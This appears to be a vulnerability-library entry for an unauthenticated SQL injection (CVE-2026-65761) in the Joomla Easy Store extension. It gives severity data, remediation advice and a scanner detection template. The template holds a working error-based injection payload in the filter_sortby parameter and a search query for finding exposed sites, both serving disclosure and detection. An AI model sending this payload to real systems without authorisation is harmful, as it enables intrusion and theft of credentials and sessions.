/Vulnerability Library

Joomla Easy Store - SQL Injection

CVE-2026-65761
Early Release

Description

Joomla Easy Store extension 1.0.0-2.0.1 contains an unauthenticated SQL injection caused by improper validation of order parameters, letting unauthenticated attackers read the full database including credentials and sessions.

Severity

Critical

CVSS Score

9.8

Exploit Probability

1%

Affected Product

Easy Store

Published Date

July 29, 2026

Template Author

yeswehack

CVE-2026-65761.yaml
id: CVE-2026-65761

info:
  name: Joomla Easy Store - SQL Injection
  author: YesWeHack
  severity: critical
  description: |
    Joomla Easy Store extension 1.0.0-2.0.1 contains an unauthenticated SQL injection caused by improper validation of order parameters, letting unauthenticated attackers read the full database including credentials and sessions.
  impact: |
    Unauthenticated attackers can read the entire database, exposing sensitive data including credentials and session information.
  remediation: |
    Update to the latest version of Easy Store extension.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2026-65761
    - https://mysites.guru/blog/easystore-security-disclosure/
    - https://www.joomshaper.com/easystore
  classification:
    cve-id: CVE-2026-65761
    epss-score: 0.00928
    epss-percentile: 0.58215
    cwe-id: CWE-89
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cpe: cpe:2.3:a:joomshaper.com:easy_store_extension_for_joomla:*:*:*:*:*:*:*:*
  metadata:
    max-requests: 1
    vendor: JoomShaper
    product: Easy Store
    fofa-query: app="joomla" && body="Easy Store"
  tags: cve,cve2026,joomla,easystore,sql-injection,unauthenticated

variables:
  num: "999999999"

http:
  - method: GET
    path:
      - "{{BaseURL}}/index.php?option=com_easystore&view=products&task=search&filter_sortby=created-ASC,EXTRACTVALUE(1,CONCAT(CHAR(126),SUBSTRING(MD5({{num}}),1,28)))--+-"

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 500'
          - 'contains_all(body, substr(md5(num), 0, 28), "XPATH syntax error")'
        condition: and
# digest: 4b0a00483046022100fd78683c5ed1e68cd43a509b4356c8cdfe9d609b80ed0f4eaccef44c0df1312e022100dc4d06e0de3b3031eaa72652d4f70c1fcfb4215305e9e7f2d9e4dc8c4d2e6887:922c64590222798bb761d5b6d8e72950
9.8Score

CVSS Metrics

CVSS Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CVE ID:
cve-2026-65761
CWE ID:
cwe-89

References

https://nvd.nist.gov/vuln/detail/CVE-2026-65761https://mysites.guru/blog/easystore-security-disclosure/https://www.joomshaper.com/easystore

Remediation Steps

Update to the latest version of Easy Store extension.